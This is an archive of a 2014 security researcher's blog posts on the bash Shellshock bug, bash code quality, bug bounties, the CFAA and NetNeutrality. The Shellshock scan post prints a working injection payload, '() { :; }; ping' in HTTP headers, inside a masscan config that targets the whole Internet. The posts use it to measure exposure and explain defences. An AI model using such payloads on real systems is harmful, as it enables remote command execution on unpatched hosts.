Saturday, September 27, 2014

The shockingly obsolete code of bash

One of the problems with bash is that it's simply obsolete code. We have modern objective standards about code quality, and bash doesn't meet those standards. In this post, I'm going to review the code, starting with the function that is at the heart of the #shellshock bug, initialize_shell_variables().

K&R function headers


The code uses K&R function headers, which have been obsolete since the mid-1980s.
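To illustrate the difference (this is a paraphrase of the style, not a verbatim quote of the bash source):

    /* K&R style (pre-1989): parameter types are declared after the
       parameter list, so the compiler cannot check calls against a
       real prototype */
    void
    initialize_shell_variables (env, privmode)
         char **env;
         int privmode;
    {
      /* ... */
    }

    /* ANSI/ISO C style (1989 onward): types appear in the prototype,
       which is what compilers and static analyzers need */
    void
    initialize_shell_variables (char **env, int privmode)
    {
      /* ... */
    }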


I don't think it's there to support older compilers, because other parts of the code use modern headers. I think it's there simply because the maintainers are paranoid about making unnecessary changes to the code. The effect is that it messes up static analysis, from simple compiler warnings to advanced security analysis tools.

It's also a stylistic issue. There's only one rule to coding style, which is "avoid surprising things", and this is surprising.

Ultimately, this isn't much of an issue in itself, but it's a symptom that something is seriously wrong with this code.

Global variables everywhere


Global variables are bad. Your program should have a maximum of five, for such things as the global debug or logging flag. Bash has hundreds of global variables.


Also note that a large number of these globals are declared in the local source file, rather than pulled in from a common header file. This is really bad.

Another way of looking at the problem is to look at the functions that operate on global variables. Such functions have no parameters, as in the following:
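Schematically, the shape is something like this (a made-up example, not actual bash code):

    /* Hypothetical illustration: a void/void function can only work by
       reading and writing globals, or by causing some other side effect */
    static int indirection_level;       /* global state */

    void
    bump_indirection_level (void)
    {
      indirection_level++;              /* data flow is invisible at the call site */
    }

    /* The preferable alternative: state in, result out */
    int
    bumped_level (int level)
    {
      return level + 1;
    }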



Functions with no parameters (void) and no return value should be an extreme rarity in C. It means the function is operating on global variables, or is producing some side effect. Since you should avoid globals and side effects, such functions should virtually never exist. In Bash, such functions are pervasive.

Lol, wat?


The first step in this function is to initialize the "environmental variables" (the ones whose contents get executed, causing the #shellshock vuln), so the first piece of code is a for loop over all the variables. This loop contains some really weird syntax:
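Paraphrased from memory (so treat the exact spelling as approximate), the loop header is essentially:

    for (string_index = 0; string = env[string_index++]; )
      {
        /* ... process 'string' ... */
      }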


This is painful for so many reasons, the most noteworthy of which is that instead of incrementing the index in the third clause of the for loop, that clause is empty and instead the programmer does it in the second clause. In other words, it should look like this:
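That is, something along these lines (a sketch of the fix, keeping the original variable name, not a tested patch):

    for (string_index = 0; string = env[string_index]; string_index++)
      {
        /* ... process 'string' ... */
      }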


(Astute readers will note that this change isn't precisely identical, but since 'string_index' is used nowhere else, either inside or after the loop, that slight change in meaning is moot).

There is really no excuse for this sort of programming. In terms of compiler optimizations, it makes no difference in performance. All it does is confuse programmers later who are trying to read your spaghetti code. To be fair, we all have brain farts where we do something weird like this -- but it seems like oddities like this are rather common in bash.

I suspect the reason the programmer did this was because the line was getting rather long, and short lines are easier to read. But the fault here is a poor choice of variable names. There is no need to call the index variable 'string_index' since it's used nowhere else except on line 329. In such cases, the variable 'i' is far superior. It communicates to the reader that you are doing the expected thing of simply enumerating 'env[]', and that the index variable is unimportant except to index things. This is really more of a stylistic issue and isn't terribly important, but I use it to hammer home the point that the less surprising the code, the better. The code should've looked like this:
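Again, as a sketch rather than a verbatim patch:

    for (i = 0; string = env[i]; i++)
      {
        /* ... process 'string' ... */
      }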


Finally, the middle clause needs some work. The expected operation there is a comparison, not an assignment. This will cause static analyzers to throw up nasty warning messages. I suppose you could call this a "false positive", since the code means to do an assignment here, but here's the rule of modern C programming: you write to make static analyzers happy. Therefore, the code needs to be changed to:
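Roughly this (the extra parentheses plus the explicit NULL comparison tell both humans and analyzers that the assignment is intentional):

    for (i = 0; (string = env[i]) != NULL; i++)
      {
        /* ... process 'string' ... */
      }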


The lesson here is that enumerating over a NULL-terminated list of strings is a damn common pattern in C. The way you do it should look the same as the way everybody else does it, and the above snippet is the pattern that most everyone uses. When you don't do the expected, you confuse everyone, from code reviewers to static analyzers.

No banned functions


Today, we know not to use dangerous functions like strcpy(), strncpy(), sprintf(), and so forth. While these functions can be used safely by careful programmers, it's simply better to ban their use altogether. If you use strcpy(), the code reviewer has to check each and every instance to make sure you've used it safely. If you've used memcpy(), they don't.

The bash code uses these dangerous functions everywhere, as in the following lines:
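The lines in question look roughly like this (paraphrased rather than quoted verbatim, but faithful to the structure being described):

    temp_string = (char *)xmalloc (3 + string_length + char_index);

    strcpy (temp_string, name);                     /* 'name' is char_index bytes long */
    temp_string[char_index] = ' ';
    strcpy (temp_string + char_index + 1, string);  /* 'string' is string_length bytes long */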


I've included enough lines to demonstrate that this use of strcpy() is safe (char_index is the length of the name string). But whether this particular instance is safe isn't the issue -- the issue is that it's really difficult for code reviewers to verify that it's safe. Simply using the safer snprintf() would've been much easier to verify:
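For example, one possible rewrite (a sketch that keeps the same allocation):

    temp_string = (char *)xmalloc (3 + string_length + char_index);
    /* the explicit size bound makes the safety argument local and obvious */
    snprintf (temp_string, 3 + string_length + char_index, "%s %s", name, string);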


One thing to remember when writing code is that making it clear to security reviewers tends to have the effect of making it clearer for everyone else as well. I think the above use of snprintf() is much clearer than strcpy() -- as well as being dramatically safer.

Conclusion


In response to #shellshock, Richard Stallman said the bug was just a "blip". It's not, it's a "blimp" -- a huge nasty spot on the radar warning of big things to come. Three more related bugs have been found, and there are likely more to be found later. The cause isn't that a programmer made a mistake, but that there is a systematic failure in the code -- it's obsolete, having been written to the standards of 1984 rather than 2014.

Where to go from here


So now that we know what's wrong, how do we fix it? The answer is to clean up the technical debt, to go through the code and make systematic changes to bring it up to 2014 standards.

This will fix a lot of bugs, but it will break existing shell-scripts that depend upon those bugs. That's not a problem -- that's what upping the major version number is for. The philosophy of the Linux kernel is a good one to emulate: documented functionality describing how the kernel should behave will be maintained until Linus's death. Undocumented, undefined behavior that stupid programs depend upon won't be maintained. Indeed, that's one of the conflicts between Gnu and Linux: Gnu projects sometimes change documented behavior while at the same time maintaining bug-compatibility.

Bash isn't crypto, but hopefully somebody will take it on as a project, like the LibreSSL cleanup effort.

Friday, September 26, 2014

Do shellshock scans violate CFAA?

In order to measure the danger of the bash shellshock vulnerability, I scanned the Internet for it. Many are debating whether this violates the CFAA, the anti-hacking law.

The answer is that everything technically violates that law. The CFAA is vaguely written allowing discriminatory prosecution by the powerful, such as when AT&T prosecuted 'weev' for downloading iPad account information that they had made public on their website. Such laws need to be challenged, but sadly, those doing the challenging tend to be the evil sort, like child molesters, terrorists, and Internet trolls like weev. A better way to challenge the law is with a more sympathetic character. Being a good guy defending websites still doesn't justify unauthorized access (if indeed it's unauthorized), but it'll give credence to the argument that the law is unconstitutionally vague because I'm obviously not trying to "get away with something".

Thursday, September 25, 2014

Many eyes theory conclusively disproven

Just because a bug was found in open-source code does not disprove the "many eyes" theory. What disproves it is that bugs are being found now that should've been found sometime in the last 25 years.

Many eyes are obviously looking at bash now, and they are finding fairly obvious problems. It's obvious that the parsing code in bash is deeply flawed, though any particular bug isn't so obvious. If many eyes had been looking at bash over the past 25 years, these bugs would've been found a long time ago.

Thus, we know that "many eyes" haven't been looking at bash.

The theory is the claim, promoted by open-source advocates, that "many eyes make bugs shallow" -- that open-source will have fewer bugs (and fewer security problems) since anyone can look at the code.

What we've seen is that, in fact, very few people ever read code, even when it's open-source. The average programmer writes 10x more code than they read. The only people for whom that equation is reversed are professional code auditors -- and they are hired primarily to audit closed-source code. Companies like Microsoft pay programmers to review code because reviewing code is not otherwise something programmers like to do.

From bash to OpenSSL to LZO, the evidence is clear: few eyes are looking at open-source.



Shellshock is 20 years old (get off my lawn)

The bash issue is 20 years old. By this I don't mean the actual bug is that old (though it appears it might be), but that we've known for that long that passing HTTP values to shell scripts is a bad idea.

My first experience with this was in 1995. I worked for "Network General Corporation" (which would later merge with McAfee Associates). At the time, about 1000 people worked for the company. We made the Sniffer, the original packet-sniffer that gave its name to the entire class of products.

One day, the head of IT comes to me with an e-mail from some unknown person informing us that our website was vulnerable. He was in standard denial, asking me to confirm that "this asshole is full of shit".

But no, whoever had sent us the email was correct, and obviously so. I was enough of a security expert that our IT guy would come to me, yet I hadn't considered that bug before (to my great embarrassment). Of course, one glance at the email and I knew it was true. I didn't have to try it out on our website, because it was self-evident from the way CGI scripting worked. I forget the exact details, but it was essentially no different than the classic '/cgi-bin/phf' bug.

So we've known for 20 years that this is a problem -- why does it still happen? I think the problem is that most people don't know how things work. Like the IT guy 20 years ago, they can't look at a system and immediately understand the implications and see what's wrong. So they keep using it. This perpetuates itself into legacy code that we can never get rid of. It's like mainframes: 20 years out of date and still a 50-billion-dollar-a-year business for IBM.












Wednesday, September 24, 2014

Bash 'shellshock' bug is wormable

Early results from my scan: there are about 3000 systems vulnerable just on port 80, just on the root "/" URL, without the Host field. That doesn't sound like a lot, but that's not where the bug lives. Update: oops, my scan broke early in the process and stopped capturing the responses -- it's probably a lot more responses than that.

Firstly, only about 1 in 50 webservers respond correctly without the proper Host field. Scanning with the correct domain names would lead to a lot more results -- about 50 times more.

Secondly, it's things like CGI scripts that are vulnerable, deep within a website (like CPanel's /cgi-sys/defaultwebpage.cgi). Getting just the root page is the thing least likely to be vulnerable. Spidering the site, and testing well-known CGI scripts (like the CPanel one) would give a lot more results, at least 10x.

Thirdly, it's embedded webservers on odd ports that are the real danger. Scanning more ports would give a couple of times more results.

Fourthly, it's not just web, but other services that are vulnerable, such as the DHCP service reported in the initial advisory.

Consequently, even though my light scan found only 3000 results, this thing is clearly wormable, and can easily worm past firewalls and infect lots of systems. One key question is whether the Mac OS X and iPhone DHCP services are vulnerable -- once the worm gets behind a firewall and runs a hostile DHCP server, that would be "game over" for large networks.



Update: As many people point out, the PATH variable isn't set, so I need the full path '/usr/bin/ping' instead to get even more results.

Update: Someone is using masscan to deliver malware. They'll likely have compromised most of the systems I've found by tomorrow morning. If they use different URLs and fix the Host field, they'll get tons more.




Bash 'shellshock' scan of the Internet

NOTE: malware is now using this as its User-agent. I haven't run a scan for over two days.

I'm running a scan right now of the Internet to test for the recent bash vulnerability, to see how widespread this is. My scan works by stuffing a bunch of "ping home" commands in various CGI variables. It's coming from IP address 209.126.230.72.

The configuration file for masscan looks something like:

target-ip = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header[Cookie] = () { :; }; ping -c 3 209.126.230.74
http-header[Host] = () { :; }; ping -c 3 209.126.230.74
http-header[Referer] = () { :; }; ping -c 3 209.126.230.74

(Actually, these last three options don't quite work due to a bug, so you have to manually add them to the code https://github.com/robertdavidgraham/masscan/blob/master/src/proto-http.c#L120)

Some early results show that this bug is widespread.
A discussion of the results is in the next blogpost here. The upshot is this: while this scan found only a few thousand systems (because it's intentionally limited), it looks like the potential for a worm is high.


Bash 'shellshock' bug as big as Heartbleed

Today's bash bug is as big a deal as Heartbleed. That's for many reasons.

The first reason is that the bug interacts with other software in unexpected ways. We know that interacting with the shell is dangerous, but we write code that does it anyway. An enormous percentage of software interacts with the shell in some fashion. Thus, we'll never be able to catalogue all the software out there that is vulnerable to the bash bug. This is similar to the OpenSSL bug: OpenSSL is included in a bajillion software packages, so we were never able to fully quantify exactly how much software is vulnerable.

The second reason is that while the known systems (like your web-server) are patched, unknown systems remain unpatched. We see that with the Heartbleed bug: six months later, hundreds of thousands of systems remain vulnerable. These systems are rarely things like webservers, but are more often things like Internet-enabled cameras.

Internet-of-things devices like video cameras are especially vulnerable because a lot of their software is built from web-enabled bash scripts. Thus, not only are they less likely to be patched, they are more likely to expose the vulnerability to the outside world.

Unlike Heartbleed, which only affected a specific version of OpenSSL, this bash bug has been around for a long, long time. That means there are lots of old devices on the network vulnerable to this bug. The number of systems needing to be patched, but which won't be, is much larger than Heartbleed.

There's little need to rush and fix this bug. Your primary servers are probably not vulnerable to this bug. However, everything else probably is. Scan your network for things like Telnet, FTP, and old versions of Apache (masscan is extremely useful for this). Anything that responds is probably an old device needing a bash patch. And, since most of them can't be patched, you are likely screwed.
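For example, a masscan configuration along these lines (the address range and port list here are placeholders; adjust them for your own network) will grab banners from Telnet, FTP, and HTTP so you can spot the old gear:

target-ip = 10.0.0.0/8
port = 21,23,80
banners = true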




Update: I think people are calling this the "shellshock" bug. Still looking for official logo.



Update: Note that the thing with the Heartbleed bug wasn't that the Internet was going to collapse, but that it's in so many places that we really can't eradicate it all. Thus, saying "as bad as Heartbleed" doesn't mean your website is going to get hacked tomorrow, but that a year from now we'll be reading about how hackers got into something interesting using the vulnerability.



Exploit details: The way this bug is exploited is via anything that first sticks some Internet parameter in an environmental variable, and then executes a bash script. Thus, simply calling bash isn't the problem. Some things (like PHP, apparently) aren't necessarily vulnerable, but other things (like CGI shell scripts) are vulnerable as all get out. For example, a lot of wireless routers shell out to "ping" and "traceroute" -- these are all likely vulnerable.
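To make the pattern concrete, here is a hypothetical sketch in C of the vulnerable idiom (the header name, script path, and function are invented for illustration; the point is the environment-variable-then-shell sequence, not any particular product):

    #include <stdlib.h>

    /* Hypothetical CGI-style handler: an attacker-controlled HTTP header
       value is copied into an environment variable... */
    void handle_request(const char *user_agent)
    {
        /* e.g. user_agent = "() { :; }; ping -c 3 209.126.230.74" */
        setenv("HTTP_USER_AGENT", user_agent, 1);

        /* ...and then a shell script is executed. If the shell that runs it
           is bash, bash imports the variable as a function definition and,
           due to the bug, also executes the trailing command. */
        system("/var/www/cgi-bin/status.cgi");
    }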




Tuesday, September 23, 2014

EFF, Animal Farm version

In celebration of "Banned Books Week", the EFF has posted a picture of their employees sitting around "reading" banned books. Amusingly, the person in the back is reading "Animal Farm", a book that lampoons the populist, revolutionary rhetoric the EFF itself uses.

Orwell wrote Animal Farm at the height of World War II, when the Soviet Union was our ally against Germany and Stalin was highly regarded by intellectuals. The book attacks Stalin's cult of personality, showing how populist "propaganda controls the opinion of enlightened people in democratic countries". In the book, populist phrases like "All animals are equal" get amended over time with such things as "...but some animals are more equal than others".

The hero worship geeks have for the EFF is a modern form of that cult of personality. Computer geeks unquestioningly support the EFF, even when the EFF contradicts themselves. There are many examples, such as supporting coder's rights while simultaneously attacking "unethical" coders. The best example, though, is NetNeutrality, where the EFF wants the government to heavily regulate Internet providers like Comcast. This is a complete repudiation of the EFF's earlier position set forth in their document "Declaration of Independence of Cyberspace".

So I thought I'd amend that document with updated EFF rhetoric:

  • You [governments] are not welcome among us, but corporations are even less welcome.
  • You have no some sovereignty where we gather.
  • You have no moral right to rule us to excess.
  • We did not invite you then, but we invite you now.
  • Do not think that you can build it, as though it were a public construction project. Thanks for building cyberspace, now please run it like a public utility.

Sunday, September 14, 2014

Hacker "weev" has left the United States

Hacker Andrew "weev" Auernheimer, who was unjustly persecuted by the US government and recently freed after a year in jail when the courts agreed his constitutional rights had been violated, has now left the United States for a non-extradition country:


Thursday, September 11, 2014

Rebuttal to Volokh's CyberVor post

The "Volokh Conspiracy" is a wonderful libertarian law blog. Strangely, in the realm of cyber, Volokh ignores his libertarian roots and instead chooses authoritarian commentators, like NSA lawyer Stewart Baker or former prosecutor Marcus Christian. I suspect Volokh is insecure about his (lack of) cyber-knowledge, and therefore defers to these "experts" even when it goes against his libertarian instincts.

The latest example is a post by Marcus Christian about the CyberVor network -- a network that stole 4.5 billion credentials, including 1.2 billion passwords. The data cited in support of its authoritarian conclusions has little value.

A "billion" credentials sounds like a lot, but in reality, few of those credentials are valid. In a separate incident yesterday, 5 million Gmail passwords were dumped to the Internet. Google analyzed the passwords and found only 2% were valid, and that automated defenses would likely have blocked exploitation of most of them. Certainly, 100,000 valid passwords is a large number, but it's not the headline 5 million number.

That's the norm in cyber. Authoritarian types who want to sell you something can easily quote outrageous headline numbers, and while others can recognize that the data are hyped, few have the technical expertise to adequately rebut them. I speak at hacker conferences on the topic of password hacking [1] [2]; I can assure you those headline numbers are grossly inflated. They may be true after a fashion, but they do not imply what you think they do.

That blog post also cites a study by CSIS/McAfee claiming the economic cost of cybercrime is $475 billion per year. This number is similarly inflated, by a factor of 10 to 100.

We know the sources of income for hackers, such as credit card fraud, ransomware, and DDoS extortion. Of these, credit card fraud is by far the leading source of income. According to a July 2014 study by the US DoJ and FTC, all credit card fraud world-wide amounts to $5.55 billion per year. Since we know that less than half of this is due to hackers, and that credit card fraud is more than half of what hackers earn, this sets the upper limit on hacker income -- about 1% of what CSIS/McAfee claim as the cost of cybercrime. Of course, the costs incurred by hackers can be much higher than their income, but knowing their income puts us in the right ballpark.

Where CSIS/McAfee get their eye-popping numbers is vague estimates about such things as "loss of reputation" and "intellectual property losses". These numbers are arbitrary, depending upon a wide range of assumptions. Since we have no idea where they get such numbers, we can't put much faith in them.

Some of what they do divulge about their methods is obviously flawed. For example, when discussing why some countries don't report cybercrime losses, they say:
that some countries are miraculously unaffected by cybercrime despite having no better defenses than countries with similar income levels that suffer higher loss—seems improbable
This is wrong for two enormous reasons.

I developed a popular tool for scanning the Internet, and use it often to scan everything. Among the things this has taught me is that countries vary enormously, both in the way they exploit the Internet and in their "defenses". Two neighboring countries with similar culture and economic development can nonetheless vary widely in their Internet usage. In my personal experience, it is not improbable that two countries with similar income levels will suffer different losses.

The second reason the above statement is wrong is their view of "defenses", as if the level of defense (anti-virus, firewalls, intrusion prevention) has a bearing on rates of hacking. It doesn't. It's like cars: what matters most as to whether you die in an accident is how often you drive, how far, where, and how good a driver you are. What matters less are "defenses" like air bags and anti-lock brakes. That's why automobile death rates in America correlate with things like recessions, the weather, the building of freeways, and cracking down on drunk drivers. What they don't correlate with are technological advances in "defenses" like air bags. These "defenses" aren't useless, of course, but drivers respond by driving more aggressively and paying less attention to the road. The same is true in cyber: technologies like intrusion prevention aren't a magic pill that wards off hackers, but a tool that allows increased risk-taking and different tradeoffs when exploiting the Internet. What you get from better defenses is increased profits from the Internet, rather than decreased losses. I say this as the inventor of the "intrusion prevention system", a popular cyber-defense that is now a $2 billion/year industry.

That McAfee and CSIS see "defenses" the wrong way reflects the fact that McAfee wants to sell "defensive" products, and CSIS wants to sell authoritarian legislation. Their report is not an honest assessment from experts, but an attempt to persuade people into buying what these organizations have to sell.

By the way, that post mentions "SQL injection". It's a phrase you should pay attention to, because it's been the most common way of hacking websites for over a decade. It's so easy that teenagers with little skill can use SQL injection to hack websites. It's also easily preventable: just use a thing called "parameterized queries" instead of a thing called "string pasting". Yet, schools keep pumping out website designers who know nothing of SQL injection and who "paste strings" together. This leads to the intractable problem that if you hire a university graduate to do your website, they'll put SQL injection flaws in the code that your neighbor's kid will immediately hack. Companies like McAfee try to sell you defenses like "WAFs" that only partly defend against the problem. The solution isn't adding "defenses" like WAFs, but changing the code from "string pasting" to "parameterized queries", which completely prevents the problem. That our industry thinks in terms of "adding defenses" from vendors like McAfee, instead of just fixing the problem, is why cybersecurity has become intractable in recent years.
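To show the difference, here is a sketch using the sqlite3 C API purely as an illustration (the table and function names are invented; any database API with bound parameters works the same way):

    #include <stdio.h>
    #include <sqlite3.h>

    /* "String pasting": the attacker-controlled 'name' becomes part of the
       SQL text, so name = "x' OR '1'='1" rewrites the query itself. */
    int find_user_unsafe(sqlite3 *db, const char *name)
    {
        char sql[256];
        snprintf(sql, sizeof(sql),
                 "SELECT id FROM users WHERE name = '%s'", name);
        return sqlite3_exec(db, sql, NULL, NULL, NULL);
    }

    /* Parameterized query: 'name' is bound as data and can never become SQL. */
    int find_user_safe(sqlite3 *db, const char *name)
    {
        sqlite3_stmt *stmt;
        int rc = sqlite3_prepare_v2(db,
                 "SELECT id FROM users WHERE name = ?", -1, &stmt, NULL);
        if (rc != SQLITE_OK)
            return rc;
        sqlite3_bind_text(stmt, 1, name, -1, SQLITE_TRANSIENT);
        rc = sqlite3_step(stmt);
        sqlite3_finalize(stmt);
        return rc;
    }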

Marcus Christian's post ends with the claim that "law enforcement agencies must assume broader roles and bear greater burdens", that "individual businesses cannot afford to face cybercriminals alone", and then paraphrases text of recently proposed cybersecurity legislation. If you are libertarian, you should oppose this legislation. It's a power grab, increasing your own danger from law enforcement, and doing nothing to lessen the danger from hackers. I'm an expert in cybersecurity who helps companies defend against hackers, yet I'm regularly threatened and investigated by law enforcement thugs. They don't understand what I do, it's all witchcraft to them, so they see me as part of the problem rather than the solution. Law enforcement already has too much power in cyberspace, it needs to be rolled back, not extended.


In conclusion, rather than an "analysis" as Eugene Volokh claims, this post from Marcus Christian was transparent lobbying for legislation, with the standard distortion of data that the word "lobbying" implies. Readers of that blog shouldn't treat it as anything more than that.

Wednesday, September 10, 2014

What they claim about NetNeutrality is a lie

The EFF and other activists are promoting NetNeutrality in response to the FCC's request for comment. What they tell you is a lie. I thought I’d write up the major problems with their arguments.


“Save NetNeutrality”


Proponents claim they are trying to “save” NetNeutrality and preserve the status quo. This is a bald-faced lie.

The truth is that NetNeutrality is not now, nor has it ever been, the law. Fast-lanes have always been the norm. Most of your network traffic goes through fast-lanes (“CDNs”), for example.

The NPRM (the FCC request for comments we are all talking about here) quite clearly says: "Today, there are no legally enforceable rules by which the Commission can stop broadband providers from limiting Internet openness".

NetNeutrality means a radical change, from the free-market Internet we’ve had for decades to a government regulated utility like electricity, water, and sewer. If you like how the Internet has been running so far, then you should oppose the radical change to NetNeutrality.


“NetNeutrality is technical”


Proponents claim there is something “technical” about NetNeutrality, that the more of a geek/nerd you are, the more likely you are to support it. They claim NetNeutrality supporters have some sort of technical authority on the issue. This is a lie.

The truth is that NetNeutrality is pure left-wing dogma. That’s why the organizations supporting it are all well-known left-wing organizations, like Greenpeace, Daily Kos, and the EFF. You don’t see right-wing or libertarian organizations on the list supporting today’s protest. In contrast, other issues like the "SOPA blackout" and protests against the NSA enjoy wide bi-partisan support among right-wing, libertarian, and left-wing groups.

Your support of NetNeutrality correlates with your general political beliefs, not with your technical skill. One of the inventors of TCP/IP is Vint Cerf who supports NetNeutrality – and a lot of other left-wing causes. Another inventor is Bob Kahn, who opposes NetNeutrality and supports libertarian causes.

NetNeutrality is a political slogan only. It has as much technical meaning as "Hope and Change". Ask 10 people what the phrase technically means and you'll get 13 answers.

The only case where NetNeutrality correlates with technical knowledge is among those geeks who manage networks – and it’s an inverse correlation (they oppose it). That’s because they want technologists and not politicians deciding how to route packets.


“Fast lanes will slow down the Internet”


Proponents claim that fast-lanes for some will mean slow-lanes for everyone else. The opposite is true – the Internet wouldn’t work without fast lanes, because they shunt high-volume traffic off expensive long-distance links.

The fundamental problem with the Internet is the “tragedy of the commons”, where a lot of people freeload off the system. This discourages the investment needed to speed things up. Charging for fast-lanes fixes this problem – those willing to pay for faster speeds fund the investment that makes the Internet faster. Everyone benefits – those in the new fast-lane, and those whose slow-lanes become less congested.

This is proven by “content delivery networks” or “CDNs”, which are the most common form of fast lanes. (Proponents claim that CDNs aren’t the fast lanes they are talking about, but that too is a lie). Most of your network traffic doesn’t go across long-distance links to places like Silicon Valley. Instead, most of it goes to these CDNs in data centers in your local city. Companies like Apple and Facebook maintain their own CDNs; others like Akamai and Lightspeed charge customers for the privilege of being hosted on their CDNs. CDNs are the very essence of fast lanes, and the Internet as we know it wouldn’t happen without them.


“Bad things will happen”


NetNeutrality proponents claim bad things will happen in the future. These are lies, made-up stories designed to frighten you. You know they are made-up stories because NetNeutrality has never been the law, and the scary scenarios haven’t come to pass.

The left-wingers may be right, and maybe the government does indeed need to step in and regulate the Internet like a utility. But, we should wait for problems that arise and fix them – not start regulating to prevent bad things that would never actually occur. It’s the regulation of unlikely scenarios that is most likely to kill innovation on the future Internet. Today, corporations innovate first and ask forgiveness later, which is a far better model than having to ask a government bureaucrat whether they are allowed to proceed – then proceeding anyway by bribing or lobbying the bureaucrats.


“Bad things have happened”


Proponents claim that a few bad things have already happened. This is a lie, because they are creating a one-sided description of events.

For example, a few years ago, Comcast filtered BitTorrent traffic in a clear violation of NetNeutrality ideals. This was simply because the network gets overloaded during peak hours (5pm to 9pm) and BitTorrent users don’t particularly care about peak hours. Thus, by slowing down BitTorrent during peak hours, Comcast improved the network for everyone without inconveniencing BitTorrent users. It was a win-win solution to the congestion problem.

NetNeutrality activists hated the solution. Their furor caused Comcast to change their policy: no longer filtering BitTorrent, but imposing a 250-gigabyte bandwidth cap on all their users instead. This was a lose-lose solution – both BitTorrent users and Comcast's normal customers hated it – but NetNeutrality activists accepted it.

NetNeutrality activists describe the problem as whether or not Comcast should filter BitTorrent, as if filtering/not-filtering were the only two choices. That's a one-sided description of the problem. Comcast has a peak-hour congestion problem. The choices are to filter BitTorrent, impose bandwidth caps, bill by amount downloaded, bill low-bandwidth customers in order to subsidize high-bandwidth customers, let all customers suffer congestion, and so on. By giving a one-sided description of the problem, NetNeutrality activists make it look like Comcast was evil for choosing a bad solution to the problem, but in truth, all the alternatives are bad.

A similar situation is the dispute between NetFlix and Comcast. NetFlix has been freeloading off the system, making the 90% of low-bandwidth customers subsidize the 10% who do streaming video. Comcast is trying to make those who do streaming pay for the costs involved. They are doing so by making NetFlix use CDNs like all other heavy users of the network. Activists take a very narrow view of this, casting Comcast as the bad guy, but any technical analysis of the situation shows that NetFlix is the bad guy freeloading on the system, and Comcast is the good guy putting a stop to it.

Companies like Comcast must solve technical problems. NetNeutrality deliberately distorts the description of the problems in order to make corporations look evil. Comcast certainly has monopolies in big cities on broadband (above 10mbps) Internet and we should distrust them, but the above examples were decided on technical grounds, not on rent-seeking monopolist grounds.


Conclusion


I’m not trying to sway your opinion on NetNeutrality, though of course it’s quite clear I oppose it. Instead, I’m trying to prove that the activists protesting today are liars. NetNeutrality isn’t the status quo or the current law, it’s not being “saved”. NetNeutrality is pure left-wing politics, not technical, and activists have no special technical authority on the issue. Fast-lanes are how the Internet works, they don’t cause slow-lanes for everyone else. The activists stories of future doom are designed to scare you and aren’t realistic, and their stories of past problems are completely distorted.





Frankly, activists are dishonest with themselves, as shown in the following tweet. In their eyes, Comcast is evil and "all about profits" because they lobby against NetNeutrality, while NetFlix is a responsible/good company because they support NetNeutrality. But of course, we all know that NetFlix is likewise "all about profits", and their support for NetNeutrality is purely because they will profit by it.





Thursday, September 04, 2014

Vuln bounties are now the norm

When you get sued for a cybersecurity breach (such as in the recent Home Depot case), one of the questions will be "did you follow industry norms?". Your opposition will hire expert witnesses like me to say "no, they didn't".

One of those norms you fail at is "Do you have a vuln bounty program?". These are programs that pay hackers to research and disclose vulnerabilities (bugs) in their products/services. Such bounty programs have proven their worth at companies like Google and Mozilla, and have spread through the industry. The experts in our industry agree: due-diligence in cybersecurity means that you give others an incentive to find and disclose vulnerabilities. Contrariwise, anti-diligence is threatening, suing, and prosecuting hackers for disclosing your vulnerabilities.

There are now two great bounty-as-a-service*** companies "HackerOne" and "BugCrowd" that will help you run such a program. I don't know how much it costs, but looking at their long customer lists, I assume it's not too much.

I point this out because a lot of Internet companies have either announced their own programs, or signed onto the above two services, such as the recent announcement by Twitter. All us experts think it's a great idea and that the tradeoffs are minor. I mean, a lot of us understand tradeoffs, such as why HTTPS is difficult for your website -- we don't see important tradeoffs for vuln bounties. It is now valid to describe this as a "norm" for cybersecurity.




By the way, I offer $100 in BitCoin for vulns in my tools that I publish on GitHub:
https://github.com/robertdavidgraham



*** Hacker1 isn't a "bounty-as-a-service" company but a "vuln coordination" service. However, all the high-profile customers they highlight offer bounties, so it comes out to much the same thing. They might not handle the bounties directly, but they are certainly helping the bounty process.




Update: One important tradeoff is that such bounty programs attract a lot of noise from idiots, such as "your website doesn't use SSL, now gimme my bounty" [from @beauwoods]. Therefore, even if you have no vulnerabilities, there is some cost to such programs. That's why BugCrowd and Hacker1 are useful: they can more efficiently sift through the noise than your own organization. However, this highlights a problem in your organization: if you don't have the expertise to filter through such noise (and many organizations don't), then you don't have the expertise to run a bug bounty program. However, this also means you aren't in a position to be trusted.

Update: Another cost [from @JardineSoftware] is that by encouraging people to test your site, you'll increase the number of false-positives on your IDS. It'll be harder now to distinguish testers from attackers. That's not a concern: the real issue is that you spend far too much time looking at inbound attacks already and not enough at successful outbound exfiltration of data. If encouraging testers doubles the number of IDS alerts, then that's a good thing not a bad thing.

Update: You want to learn about cybersecurity? Then just read what's in/out of scope for the Yahoo! bounty: https://hackerone.com/yahoo